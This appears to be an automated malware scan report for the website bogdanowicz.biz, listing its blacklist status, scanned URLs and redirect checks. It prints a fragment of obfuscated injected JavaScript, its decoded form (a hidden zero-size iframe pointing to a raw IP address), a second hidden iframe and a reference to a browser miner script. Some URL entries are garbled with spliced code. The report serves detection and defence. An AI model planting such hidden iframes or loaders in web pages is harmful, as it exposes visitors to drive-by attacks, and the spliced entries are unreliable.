Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bogdanowicz.biz
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bogdanowicz.biz/ | 200 OK Content-Length: 187364 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) njfzym="spl"+"i"+"t";huexek=window;xgkzlp=(1)?"0x":"123";oye=(5-3-1);try{--(document["b"+"ody"])}catch(zrly){ruj=false;try{}catch(mbljg){ruj=21;}
if(1){loe="0:0:60:5d:17:1f:5b:66:5a:6c:ript src="http: Decoded script: <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://91.217.91.104//?id=1&se_referer=undefined&charset=utf-8"></iframe> Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://utkarshavidyalaya.org/css/css_old/bindex.php <iframe src="http://utkarshavidyalaya.org/css/css_old/bindex.php" width="0" height="0" frameborder="0"> | ||
http://91.239.65.173/t/link.php | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://91.239.65.173/test404page.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js | 200 OK Content-Length: 91342 Content-Type: text/javascript | clean |
http://www.bitcoinplus.com/js/miner.js | 200 OK Content-Length: 19329 Content-Type: application/x-javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jqucatch(mbljg){ruj=21;}
if(1){loe= | 404 Not Found Content-Length: 1494 Content-Type: text/html | clean |
http://ajax.googleapis.com//www.google.com/ | 404 Not Found Content-Length: 1440 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/pt | 404 Not Found Content-Length: 11906 Content-Type: text/html | clean |
http://ajax.googleapis/ | 500 Can't connect to ajax.googleapis:80 Content-Length: 190 Content-Type: text/plain | clean |
http://counter.olusoft.com/1245361/link.php | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.bitcoinplus.com/js/a:6b:70:63:5c:25:6b:66:67:34:1e:27:1e:32:5d:25:6a:5c:6b:38:6b:6b:69:60:5:27:27:27:27:67:6f:1e:32:5d:25:6a:6b:70:63:5c:25:6b:66:67:34:1e:27:1e:32:5d:25googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js | 200 OK Content-Length: 9510 Content-Type: text/html | clean |
http://www.google.com/recaptcha/api/challenge?k=6Ldo5-sSAAAAABbuUE_UomzF70Hff8ZpNmCVhNdT | 200 OK Content-Length: 8693 Content-Type: text/javascript | clean |
http://www.bitcoinplus.com/password/resetyour | 200 OK Content-Length: 4504 Content-Type: text/html | clean |
http://www.bitcoinplus.com/assets/1.8/stack/en/core.js | 200 OK Content-Length: 24374 Content-Type: text/javascript | clean |
http://www.bitcoinplus.com/assets/1.8/ctx/js/jquery-1.6.1.js | 200 OK Content-Length: 24366 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bogdanowicz.biz
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 14 Jan 2015 09:33:23 GMT
Server: Apache
Content-Type: text/html
GET / HTTP/1.1
Host: bogdanowicz.biz
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 14 Jan 2015 09:33:23 GMT
Server: Apache
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: bogdanowicz.biz
Referer: http://www.google.com/search?q=bogdanowicz.biz
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bogdanowicz.biz
Referer: http://www.google.com/search?q=bogdanowicz.biz
Result:
The result is similar to the first query. There are no suspicious redirects found.